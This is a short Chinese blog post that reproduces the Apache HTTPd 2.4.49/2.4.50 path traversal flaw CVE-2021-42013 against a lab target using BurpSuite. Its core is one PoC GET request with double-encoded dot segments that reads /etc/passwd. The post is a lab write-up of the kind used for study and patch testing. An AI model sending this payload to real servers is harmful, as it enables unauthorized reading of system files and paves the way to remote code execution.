备案控制台
开发者社区 安全 文章 正文

CVE-2021-42013 Apache HTTPd 2.4.49 2.4.50 路径穿越以及RCE漏洞

2022-12-15 324
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 影响版本Apache 2.4.49Apache 2.4.50当前描述发现Apache HTTP Server 2.4.50中对CVE-221-41773的修复不足。攻击者可以使用路径遍历攻击将URL映射到Alias类指令配置的目录之外的文件。如果这些目录之外的文件不受通常默认配置“要求全部拒绝”的保护,这些请求可能会成功。如果还为这些别名路径启用了CGI脚本,这可能允许远程代码执行。此问题仅影响Apache 2.4.49和Apache 2.4.50,而不影响早期版本。环境搭建可以查看我的上一篇文章https://developer.aliyun.com/article/11136

影响版本
Apache 2.4.49
Apache 2.4.50
当前描述

发现Apache HTTP Server 2.4.50中对CVE-221-41773的修复不足。攻击者可以使用路径遍历攻击将URL映射到Alias类指令配置的目录之外的文件。如果这些目录之外的文件不受通常默认配置“要求全部拒绝”的保护,这些请求可能会成功。如果还为这些别名路径启用了CGI脚本,这可能允许远程代码执行。此问题仅影响Apache 2.4.49和Apache 2.4.50,而不影响早期版本。
环境搭建可以查看我的上一篇文章
https://developer.aliyun.com/article/1113693?spm=a2c6h.26396819.creator-center.10.43283e1865liIz
靶机ip:192.168.0.11:8080
漏洞复现
我们在kali中对靶场进行抓包
BurpSuite抓到的包

image.png

Poc:

GET /icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1
把捕获的数据包发送到repeater
然后将坡村复制到数据包中然后发送
image.png
复现完成

文章标签:
Apache
安全
关键词:
Apache漏洞
Apache rce
Apache rce漏洞
Apache httpd
Apache httpd漏洞
郝奕程
目录
相关文章
流烟默
|
2月前
|
Linux 网络安全 Apache
Centos下操作Apache httpd
Centos下操作Apache httpd
流烟默
94 0
李火火
|
10月前
|
安全 应用服务中间件 Apache
Apache-Tomcat-Ajp文件读取漏洞(CVE-2020-1938、CNVD-2020-10487)
Apache-Tomcat-Ajp文件读取漏洞产生原因是由于Tomcat默认开启的AJP服务(8009端口)存在一处文件包含缺陷,攻击者可构造恶意的请求包进行文件包含操作,进而读取受影响Tomcat服务器上的Web目录文件
李火火
372 1
泡沫o0
|
2月前
|
Shell Linux 网络安全
【Shell 命令集合 网络通讯 】Linux 管理Apache HTTP服务器 httpd命令 使用指南
【Shell 命令集合 网络通讯 】Linux 管理Apache HTTP服务器 httpd命令 使用指南
泡沫o0
48 0
李火火
|
10月前
|
安全 Java Shell
Apache Log4j2 远程代码执行漏洞
Apache Log4j2是一个·基于Java的日志记录工具,该工具重写了Log4j框架,并且引入大量丰富的特性,该日志框架被大量用于业务系统开发,用来记录日志信息。
李火火
71 2
李火火
|
10月前
|
SQL 安全 数据可视化
Apache Superset 未授权访问漏洞(CVE-2023-27524)
Apache Superset 存在未授权访问漏洞,攻击者可利用该漏洞验证和访问未经授权的资源。
李火火
166 1
No8g攻城狮
|
9月前
|
存储 安全 Java
【Shiro】Apache Shiro 默认密钥致命令执行漏洞(CVE-2016-4437)的解决方案
【Shiro】Apache Shiro 默认密钥致命令执行漏洞(CVE-2016-4437)的解决方案
No8g攻城狮
222 0
Tom弹架构
|
11月前
|
安全 druid Java
【紧急】Apache Log4j任意代码执行漏洞安全风险升级修复教程
近期一个 Apache Log4j 远程代码执行漏洞细节被公开,攻击者利用漏洞可以远程执行代码。经过分析,该组件存在Java JNDI注入漏洞,当程序将用户输入的数据进行日志,即可触发此漏洞,成功利用此漏洞可以在目标服务器上执行任意代码。
Tom弹架构
271 1
嘿嘿龙帅
|
10月前
|
缓存 网络协议 PHP
httpd和apache
httpd和apache
嘿嘿龙帅
48 0
云鲨RASP
|
消息中间件 存储 安全
【高危】 Apache Kafka 远程代码执行漏洞复现及攻击拦截 (CVE-2023-25194)
漏洞分析,点击详阅
云鲨RASP
531 0
郑小健
|
19天前
|
监控 大数据 Java
使用Apache Flink进行大数据实时流处理
Apache Flink是开源流处理框架,擅长低延迟、高吞吐量实时数据流处理。本文深入解析Flink的核心概念、架构(包括客户端、作业管理器、任务管理器和数据源/接收器)和事件时间、窗口、状态管理等特性。通过实战代码展示Flink在词频统计中的应用,讨论其实战挑战与优化。Flink作为大数据处理的关键组件,将持续影响实时处理领域。
郑小健
149 5

热门文章

最新文章

  • 1
    Confluence 6 使用 Apache 的 mod_jk
  • 2
    apache三种工作模式
  • 3
    使用Apache Server 的ab进行web请求压力测试
  • 4
    apache+svn服务搭建
  • 5
    手动利用Apache Ant构建部署自己的Java项目
  • 6
    Apache+tomcat 快速部署Java环境
  • 7
    Apache日志轮替规则
  • 8
    Ubuntu配置apache2.4的限速功能
  • 9
    通过maven test 报org.apache.ibatis.binding.BindingException: Invalid bound statement
  • 10
    Apache支持多端口配置处理
  • 1
    数据猎手:使用Java和Apache HttpComponents库下载Facebook图像
    38
  • 2
    Apache服务器配置与优化指南
    105
  • 3
    Golang深入浅出之-Go语言中的分布式计算框架Apache Beam
    163
  • 4
    Linux _ apache服务器部署 不同域名—访问不同网站(多网站)
    69
  • 5
    查询提速11倍、资源节省70%,阿里云数据库内核版 Apache Doris 在网易日志和时序场景的实践
    52818
  • 6
    Spring BeanUtils与Apache BeanUtils提供基本属性复制,适用于简单需求
    32
  • 7
    如何在win系统部署Apache服务并实现无公网ip远程访问
    46
  • 8
    Spring Cloud Feign 使用Apache的HTTP Client替换Feign原生httpclient
    62
  • 9
    apache DbUtils 组件核心原理与应用
    36
  • 10
    阿里云数据库内核 Apache Doris 基于 Workload Group 的负载隔离能力解读
    66434

    • 相关课程

    更多
  • Apache RocketMQ:如何从互联网时代演进到云
  • Apache Flink 入门到实战 - Flink开源社区出品
  • Apache Flink 入门

    • 相关电子书

    更多
  • Apache Flink技术进阶
  • Apache Spark: Cloud and On-Prem
  • Hybrid Cloud and Apache Spark

    • 推荐镜像

    更多
  • apache
  • packman
  • CPAN
    • 下一篇
    部署LAMP环境(Alibaba Cloud Linux 3)